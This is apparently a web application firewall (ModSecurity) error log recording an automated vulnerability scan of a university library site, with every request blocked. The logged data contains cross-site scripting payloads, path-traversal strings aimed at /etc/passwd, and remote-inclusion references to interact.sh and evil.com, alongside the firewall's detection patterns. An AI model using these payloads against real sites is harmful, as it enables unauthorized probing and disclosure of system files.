[Tue Aug 29 11:55:14.581112 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApbUd0AAAAh"]
[Tue Aug 29 11:55:14.671581 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAqqtcQAAAAA"]
[Tue Aug 29 11:55:16.549307 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqTvo8AAAAa"]
[Tue Aug 29 11:55:16.859707 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6B0AAAAr"]
[Tue Aug 29 11:55:17.608734 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqTvpgAAAAa"]
[Tue Aug 29 11:55:17.620226 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqsV48AAAAB"]
[Tue Aug 29 11:55:18.614385 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqY6DIAAAAr"]
[Tue Aug 29 11:55:19.580581 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAApHRfcAAAAP"]
[Tue Aug 29 11:55:19.708207 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqqtc8AAAAA"]
[Tue Aug 29 11:55:20.555286 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqeFUMAAAAx"]
[Tue Aug 29 11:55:22.536730 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApbUfkAAAAh"]
[Tue Aug 29 11:55:22.605688 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-NsAAAAg"]
[Tue Aug 29 11:55:23.582903 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApa-OMAAAAg"]
[Tue Aug 29 11:55:23.959709 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqTvqUAAAAa"]
[Tue Aug 29 11:55:24.047508 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqqtewAAAAA"]
[Tue Aug 29 11:55:24.639194 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoz8FMAAAAS"]
[Tue Aug 29 11:55:24.712258 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqsV6sAAAAB"]
[Tue Aug 29 11:55:25.775722 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqqtfcAAAAA"]
[Tue Aug 29 11:55:25.782254 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAApbUg8AAAAh"]
[Tue Aug 29 11:55:26.732540 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqY6DsAAAAr"]
[Tue Aug 29 11:55:28.537299 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqeFW8AAAAx"]
[Tue Aug 29 11:55:29.865333 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqqtgkAAAAA"]
[Tue Aug 29 11:55:30.668234 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqY6EwAAAAr"]
[Tue Aug 29 11:55:30.691707 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqTvsoAAAAa"]
[Tue Aug 29 11:55:31.615560 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAolKqsAAAAe"]
[Tue Aug 29 11:55:32.882540 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAolKrkAAAAe"]
[Tue Aug 29 11:55:34.091852 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RsCo-f0AAAq2KckAAAAE"]
[Tue Aug 29 11:55:35.886120 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAolKtIAAAAe"]
